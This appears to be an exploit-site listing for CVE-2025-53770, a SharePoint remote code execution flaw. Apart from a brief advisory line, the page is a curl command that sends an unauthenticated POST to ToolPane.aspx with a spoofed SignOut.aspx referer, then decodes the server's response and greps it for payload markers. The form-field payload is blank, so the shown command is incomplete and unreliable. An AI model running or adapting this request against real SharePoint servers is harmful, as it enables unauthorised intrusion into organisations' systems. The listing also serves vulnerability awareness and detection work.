Exploit for Deserialization of Untrusted Data in Microsoft CVE-2025-53770

## https://sploitus.com/exploit?id=428063D1-DB03-5EE8-8BF8-EB17F4390ECE
# CVE-2025-53770-SharePoint-Deserialization-RCE-PoC
A critical vulnerability in Microsoft SharePoint Server allows unauthenticated remote code execution via deserialization of untrusted data. Microsoft is aware of active exploitation; apply CVE mitigations immediately. Severity: Critical.



commands   


curl -sk -X POST 'https://reeaccated.com/_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx' \
  -H 'Referer: /_layouts/SignOut.aspx' \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  --data-urlencode 'MSOTlPn_Uri=https://reeaccated.com' \
  --data-urlencode 'MSOTlPn_DWP=



  
    
      
    
  
' \
| grep -oP 'CompressedDataTable="\K[^&]+(?=")' \
| base64 -d 2>/dev/null \
| gzip -d 2>/dev/null \
| tee /tmp/sharepoint_decoded_payload.txt \
| grep -Ei 'IntruderScannerDetectionPayload|ExcelDataSet|divWaiting|ProgressTemplate|Scorecard'